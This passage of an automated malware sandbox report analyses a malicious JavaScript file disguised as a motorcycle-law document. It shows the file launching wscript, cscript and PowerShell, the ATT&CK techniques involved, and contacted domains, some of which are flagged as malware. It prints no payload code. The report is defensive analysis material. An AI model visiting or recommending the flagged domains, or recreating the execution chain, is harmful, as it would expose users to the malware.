Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting		Valid Accounts1
Windows Management Instrumentation		2
Scripting		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Scheduled Task/Job		1
Scheduled Task/Job		1
Scheduled Task/Job		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Exploitation for Client Execution		1
DLL Side-Loading		1
DLL Side-Loading		11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1436973 Sample: does virginia have a no cha... Startdate: 06/05/2024 Architecture: WINDOWS Score: 68 29 www.xn--operation-wstenfuchs-zec.de 2->29 31 rainmeter-skins.com 2->31 33 crackedroom.com 2->33 41 Antivirus detection for URL or domain 2->41 43 Sigma detected: WScript or CScript Dropper 2->43 8 wscript.exe 1 1 2->8         started        11 wscript.exe 1 2->11         started        13 wscript.exe 2->13         started        signatures3 process4 signatures5 49 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->49 15 cscript.exe 1 1 8->15         started        51 Suspicious execution chain found 11->51 17 cscript.exe 1 13->17         started        process6 process7 19 powershell.exe 14 49 15->19         started        23 conhost.exe 15->23         started        25 powershell.exe 39 17->25         started        27 conhost.exe 17->27         started        dnsIp8 35 www.xn--operation-wstenfuchs-zec.de 46.38.249.148, 443, 49713 NETCUP-ASnetcupGmbHDE Germany 19->35 37 rainmeter-skins.com 50.116.62.225, 443, 49711 LINODE-APLinodeLLCUS United States 19->37 45 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 19->45 47 Loading BitLocker PowerShell Module 19->47 39 crackedroom.com 172.67.208.58, 443, 49712 CLOUDFLARENETUS United States 25->39 signatures9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://mths.be/punycode0%URL Reputationsafe
https://mths.be/he0%Avira URL Cloudsafe
http://mjijackson.com/2008/02/rgb-to-hsl-and-rgb-to-hsv-color-model-conversion-algorithms-in-javascr0%Avira URL Cloudsafe
https://crackedroom.com/100%Avira URL Cloudmalware
http://erik.eae.net/simplehtmlparser/simplehtmlparser.js0%Avira URL Cloudsafe
https://rainmeter-skins.com/100%Avira URL Cloudmalware
https://mths.be/punycode.0%Avira URL Cloudsafe
http://html5sec.org/#1080%Avira URL Cloudsafe
http://html5sec.org/#1020%Avira URL Cloudsafe
https://mths.be/notes/ambiguous-ampersands0%Avira URL Cloudsafe
https://www.xn--operation-wstenfuchs-zec.de/0%Avira URL Cloudsafe
http://ecmanaut.blogspot.ca/2006/07/encoding-decoding-utf8-in-javascript.html0%Avira URL Cloudsafe
http://foo.com0%Avira URL Cloudsafe
http://html5sec.org/#133.0%Avira URL Cloudsafe
https://kangax.github.io/html-minifier/)0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.xn--operation-wstenfuchs-zec.de
46.38.249.148
truefalse
    		unknown
    crackedroom.com
    		172.67.208.58
    		truefalse
      		unknown
      rainmeter-skins.com
      		50.116.62.225
      		truefalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://rainmeter-skins.com/false
        • Avira URL Cloud: malware
        		unknown
        https://crackedroom.com/false
        • Avira URL Cloud: malware
        		unknown
        https://www.xn--operation-wstenfuchs-zec.de/false
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://mjijackson.com/2008/02/rgb-to-hsl-and-rgb-to-hsv-color-model-conversion-algorithms-in-javascrwscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
        • Avira URL Cloud: safe
        		unknown
        https://github.com/jakubpawlowicz/clean-css/issues/418wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
          		high
          https://github.com/mozilla/source-map/issues/16wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
            		high
            https://html.spec.whatwg.org/multipage/syntax.html#table-charref-overrides.wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
              		high
              https://github.com/feross/buffer/pull/97wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                		high
                http://erik.eae.net/simplehtmlparser/simplehtmlparser.jswscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                • Avira URL Cloud: safe
                		unknown
                https://mths.be/punycode.wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                • Avira URL Cloud: safe
                		unknown
                https://html.spec.whatwg.org/multipage/indices.html#elements-3wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                  		high
                  http://jsbin.com/UPUmaGOc/2/edit?jswscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                    		high
                    https://developer.mozilla.org/en/docs/Web/HTML/Element/script#attr-typewscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                      		high
                      http://nedbatchelder.com/blog/200712.html#e20071211T054956wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                        		high
                        http://opensource.org/licenses/BSD-3-Clausewscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                          		high
                          https://mathiasbynens.be/notes/ambiguous-ampersandswscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                            		high
                            https://mths.be/hewscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://stackoverflow.com/a/22747272/680742wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                              		high
                              https://bugzilla.mozilla.org/show_bug.cgi?id=369778wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                		high
                                https://github.com/Polymer/polymer-bundler/pull/519wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                  		high
                                  https://html.spec.whatwg.org/multipage/embedded-content.html#attr-img-srcsetwscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                    		high
                                    https://tools.ietf.org/html/rfc3492#section-3.4wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                      		high
                                      http://html5sec.org/#102wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://mths.be/punycodewscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://github.com/jakubpawlowicz/clean-csswscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                        		high
                                        http://html5sec.org/#108wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://html.spec.whatwg.org/multipage/dom.html#phrasing-contentwscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                          		high
                                          https://github.com/joyent/node/issues/1707wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                            		high
                                            https://mathiasbynens.be/demo/javascript-mime-typewscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                              		high
                                              https://mths.be/notes/ambiguous-ampersandswscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://mathiasbynens.be/notes/javascript-encoding#surrogate-formulaewscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                		high
                                                https://bugzilla.mozilla.org/show_bug.cgi?id=695438).wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                  		high
                                                  https://github.com/mozilla/source-map/issues/30wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                    		high
                                                    https://mathiasbynens.be/notes/ambiguous-ampersands:wscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                      		high
                                                      https://www.npmjs.com/package/ncnamewscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                        		high
                                                        https://mathiasbynens.be/notes/javascript-encodingdoes virginia have a no chase law for motorcycles 62848.jsfalse
                                                          		high
                                                          https://html.spec.whatwg.org/multipage/syntax.html#table-charref-overrideswscript.exe, 00000000.00000003.2010291113.00000193565B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019358397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193590C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010907913.00000193586C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2009510529.0000019357997000.00000004.00000020.00020000.00000000.sdmp, does virginia have a no chase law for motorcycles 62848.jsfalse
                                                            		high
